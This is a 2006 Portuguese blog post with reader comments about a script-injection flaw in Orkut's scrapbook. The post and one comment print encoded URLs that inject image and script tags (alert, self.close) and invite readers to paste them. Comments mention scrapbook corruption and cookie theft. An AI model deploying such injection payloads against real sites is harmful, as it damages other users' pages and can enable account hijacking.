Undergoogle: Falha de segurança grave é encontrada no Orkut

domingo, agosto 13, 2006

Falha de segurança grave é encontrada no Orkut

Os usuários Victor Pencak e Steven Conte reportaram uma falha de segurança grave no sistema de recados do Orkut. Graças ao bug, as pessoas podem inserir scripts, imagens e vídeos nos recados. Embora o conteudo pareça inofensivo, os scripts e imagens podem explorar falhas no navegador e no sistema, causando danos que variam de simples instabilidades à Vírus e Malwares em geral. Por isso recomendamos muito cuidado com o uso do serviço enquanto o bug não é corrigido.

Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.

http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%3D%22
endereco_da_imagem
%22%3E%3Ca%20style%3D%22display%3Anone%22%20href%3D%22%3C/a%3E

*Url dividida em linhas para facilitar a vizualização

O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.

http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert%28%22
Oi!!%22%29%3c/script%3e%3ca%20style=%22display%3anone%22%20href=%22/

*Url dividida em linhas para facilitar a vizualização

O Google ainda não se pronunciou sobre o assunto.

35 Comentários:

Opera [www.opera.com] também é bem seguro.

Ah, e o segundo código, é mais conhecido como "Fodedor de Scrapbook", ele não pode ser deletado e pode bugar todo o scrapbook, (sumir com scraps antigos, bloquear postagem de novos scraps).

Por Sonic Nix, Às 13 agosto, 2006
Realmente faz sentido o que o Sonic disse.
Tanto o sistema que posta nos scrapbooks quanto o sistema que apaga scraps é escrito em javascript, podendo assim "qualquer pessoa" escrever um código para, por exemplo, apagar todos os scraps.
Este novo template do Orkut.com está muito bugado! JavaScripts ferrados por todos os lados... E eu não tenho visto eles corrigirem tais. Só espero que não tenham abandonado o projeto :P

Por Anônimo, Às 13 agosto, 2006
Eu gostei :D

Por Anônimo, Às 13 agosto, 2006
O negócio é parar de usar orkut e começar a usar algo mais útil e com mais funções, como o Multiply e o MySpace. Uma pena que orkut "infectou" o Brasil e ninguém pensa em mudar de posição quanto a isso. Talvez porque o orkut seja o site mais próximo do nosso país: bagunça, fofoca, insegurança, falta de privacidade, vandalismo, inutilidades, burocracia, etc etc etc...

Por rbardini, Às 13 agosto, 2006
firehawkz...
falou tudo.
quero sair do orkut, mas pessoas insistem a fazer daquilo um messenger. :S
curto o myspace, apesar de não usar muito por não conhecer ninguém que tenha um, mas sei lá, cansei da cara do orkut. :S
é isso aew, flw!

Por Anônimo, Às 13 agosto, 2006
Vou deixar de acessar minha conta enquanto isso não for resolvido.

Por Ricardo Braida, Às 14 agosto, 2006
Putz tão colocando até vídeo do YouTube no orkut já... Que palhaçada!

Por rbardini, Às 14 agosto, 2006
tah realmente foda o orkut... o virus da foto jah virou piada entre os usuarios... volte e meia recebo um scrap "olhe as fotos da festa..." daí lah vou eu mandar o link do antivirus do linha defensiva da UOL...

e esses codigos... aff... ningem merece...

concordo com mta gente q chama d orkú...

Por Anônimo, Às 14 agosto, 2006
falaram uns absurdos monstros hein, o orkut bugo o site para ajuda a mozzila foi demais...
os caras estaum refazendo um site q é visitado por milhoes de pessoas, assim é facil achar erros, tem milhoes de nego sem oq fazer para achar...
o site ta mais rapido, mais leve, e ficando mais funcional...
agora so teve a onda de virus de imagens porque pessoas burras e curiosas nao ve oq clicam..., um errinho voces ja estao falando em deletar scraps em massas, nada é assim gente... calma!

Por infonlinebr, Às 14 agosto, 2006
fui testar esse script da caixa de mensagem no meu scrap e fiquei com um scrap vazio "indeletavel" :P

alguem sabe como reparar esse erro? ou soh esperando o pessoal do orkut ajeitar?

Por Anônimo, Às 14 agosto, 2006
Se alguém aí souber como deleta esse scrap vazio "indeletável" me manda um email please
christianoguedes@gmail.com

Obrigado...

Por Anônimo, Às 14 agosto, 2006
lol zuei scrapbook de uma amiga sem querer.
Não tem como deletar também...

que foda! UAHAUAHAAUAH

esse é um bom método para quem queria deletar todos os scraps UAHAUAHAUAHAU

Por Unknown, Às 14 agosto, 2006
@ estivem

O endereço do Multiply é http://www.multiply.com
Se quiser dá uma passada no meu perfil lá http://firehawkz.multiply.com
Recomendo a todos, pois a página do perfil é totalmente customizável, pode-se hospedar vídeos (importa do YouTube e Google Video), fotos (importa do flickr e ImageShack), músicas (importa não sei da onde mas importa...rs), receitas, favoritos, calendário, blog, notas e muito mais.
E lá já tem uma comunidade razoavelmente grande de brasileiros.

É isso aí, abraços.

Por rbardini, Às 14 agosto, 2006
fernando fiz o mesmo q tuh
auiaihIUahiuHa
keria apagar o scrap ki fica..se alguem souber!

italovaz@hotmail.com

Por Anônimo, Às 14 agosto, 2006
Ae para quem postou recado no scrapbook e sumiu tudo, inclusive o link para deletar o scrap.

Para resolver isto apenas deixe mais 9 recados consecutivos. Isto fará com que apareça novamente o link de "próxima página".

Simples :]

Por Unknown, Às 14 agosto, 2006
descobri como corrigir, coloca na barra de endereços:

javascript:void(document.body.innerHTML=document.body.innerHTML.replace(/script/gim,'i'));

o scrap indeletavel vira deletavel....

Por Anônimo, Às 14 agosto, 2006
Já tem jeito de colocar vídeos do YouTube também, postei até em meu blog sobre o assunto. PortalCab.com

Por Anônimo, Às 14 agosto, 2006
valeu anonimo que deu a dica de como arrumar o scrabook

Por Anônimo, Às 14 agosto, 2006
Ruim para o Google, pois devido comentários "acidos" comparando o Google com a Microsoft, isso pode diminuir a confiabilidade da marca Google no mercado.

Por Anônimo, Às 14 agosto, 2006
"Por isso recomendamos o uso do Mozilla Firefox, o navegador mais seguro disponível no mercado."

Ôpa! Aí é que está o problema, os caras deram um jeito de capturar os cookies alheios explorando esse bug. E adivinha em que navegador essa falha ocorre? Ganhou um doce quem respondeu Firefox. Isso mesmo, essa vulnerabilidade não existe no Internet Explorer.

Se quiserem mais informações, entrem em contato comigo.

Por danillonunes, Às 14 agosto, 2006
Inclusive no firefox eu posso alterar a script para

http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3eself.close%28%22%22%29%3c/script%3e%3ca%20style=%22display%3anone%22%20href=%22/

e ele fechará sozinho, sem perguntar nada!!!! O IE pelo menos avisa que a tela será fechada e permite impedir a ação.

Por Anônimo, Às 14 agosto, 2006
mesmo com essas supostas falhas, o firefox ainda é bem melhor q o IE...

Por Anônimo, Às 14 agosto, 2006
Cliquei num desses links que pega informações da conta ao visitar o perfil de uma colega e clicar no link para deixar um scrap. Adianta somente mudar a senha da conta Google (mudei imediatamente) ou uma medida mais drástica se faz necessária?

Na boa? Já passou da hora da Google dar um jeito no Orkut. Sei que a maior parte da culpa é de usuários mal intensionados e de usuários tolos que informam login e senha em sites para mandar scraps bonitinhos para todos os contatos, quando o próprio Orkut tem o envio de mensagens a todos da lista; ainda assim a Google deveria tomar uma atitude mais séria.

No momento é só o Orkut que está com má fama (reduto da pilantragem e coisas bem piores); num futuro próximo poderá ser a Google a ficar com má fama.

Gosto do Orkut. Se bem utilizada e bem administrada é uma ferramenta maravilhosa para todo tipo de pesquisa. Foi graças ao Orkut que decidi comprar determinada câmera digital, após ler relatos numa comunidade para quem tinha aquele modelo; foi no Orkut que fiquei sabendo de um defeito de fabricação da antiga máquina e que a Canon conserta o problema gratuitamente e foi o Orkut que me reaproximou de pessoas com quem estudei no Jardim de Infância!

Acredito que o Orkut ainda tenha salvação.

Por Cris, Às 14 agosto, 2006
Mas desabilitando o JavaScript no Firefox (Preferences > Content) é possível se safar do bug... o ruim é que não se pode enviar nenhum texto (scrap ou post), ou seja, o Orkut fica em 'read-only'.

Por Ricardo Braida, Às 14 agosto, 2006
Ricardo, a solução não seria então manter o javascript desabilitado e habilitá-lo somente quando for postar algo? É trabalhoso, mas ao menos garante um mínimo de segurança...

ps.: O post do blog deveria ter um alerta para o fato desse segundo código ser o "fodedor de scrapbook"

Por Anônimo, Às 14 agosto, 2006
@infoline:

Não se tratam de "absurdos monstros" como você disse. Antes de mais nada, eu gostaria de exclarecer que essa falha de segurança não requer intervenção do usuário. Por isso, não importa seu nível de conhecimento ou sua capacidade de identificar um botão malicioso, pois tudo acontece automaticamente.

Quanto ao Firefox, ele de fato ajuda. Linguagens de script são limitadas pelo aplicativo que as executa. Isso significa que você esta mais seguro em um navegador que tenha menos falhas e que impeça o acesso ao sistema através do script.

@Marcus Danillo:

"Essa vulnerabilidade" realmente não existe no internet explorer. Mas o que dizer à respeito das dezenas de outras? Outro aspecto a ser considerado é o fato de o firefox ter seu código aberto.

Por Filipe Arcanjo, Às 14 agosto, 2006
ATENÇÃO!!!!

Foi confirmado que já existem codigos que enviam o cookies para, consequentemente, as senhas do orkut.
Quem quizer estou disponibilizando um script que impede que esses códigos funcionem.

http://files.myopera.com/Luiz%20Fernando/userjs/roubo.js

Uso ele no Opera, ainda não testei no firefox.

Por Anônimo, Às 14 agosto, 2006
eu gostei.. haiusdhuasdaiushdausihdaisd
nao gostei de vc.. fodo seu scrapbook, gostei,, te mando uma imagem legal.. hasiudhuaihsduiasd
=]]]
(6)

Por Anônimo, Às 14 agosto, 2006
@SpyGamer,

em primeirao mao nao tinha testado o script ainda, pelo que lia na noticia nao parecia algo taum grande, e decorrente aos comentarios fico conclusivo isso, ainda nao acredito q posso haver o roubo de senhas por exemplo, ou mesmo instalacao de um verme ou algo do tipo na propria maquina....

Por infonlinebr, Às 14 agosto, 2006
E agora já foi corrigido... Rápido o Google, não?

Por Anônimo, Às 14 agosto, 2006
era bem o ke eu ia falar agora.. asuduhaisd mas avisei o nando antes.. =P
asdhiuahduiasd

Por Anônimo, Às 14 agosto, 2006
acabaram de arrumar o bug!
que raiva! heheheh

Por Anônimo, Às 14 agosto, 2006
hahhahaha... duas pessoas disseram comigo.... :(
que raiva... tava muito doido o youtube!

Por Anônimo, Às 14 agosto, 2006
Acabou a brincadeira.
Agora só na proxima vez
kuakuakuakuakuakuakuakua.

by C3r34l

Por Anônimo, Às 14 agosto, 2006
@Infoline:

O "poder de fogo" do JavaScript e do HTML é limitado pelo navegador utilizado. Uma possível falha nesse navegador poderia trazer conseqüências graves caso o código a ser interpretado fosse malicioso.

Veja como exemplo a Wikipédia e os fóruns em php. Eles não têm uma linguagem própria para os posts atoa. Isso é feito por medida de segurança, para evitar que usuários mal intencionados insiram código malicioso de qualquer natureza no site.

Embora tenha testado alguns scripts enquanto a falha esteve ativa, eu não tentei obter o document.cookie(); para saber se esse funcionaria, mas acredito que sim.

Por Filipe Arcanjo, Às 15 agosto, 2006

Postar um comentário

Assinar Postar comentários [Atom]

<< Página inicial

Undergoogle

domingo, agosto 13, 2006

Falha de segurança grave é encontrada no Orkut

35 Comentários:

Sobre

Colaboradores

Anterior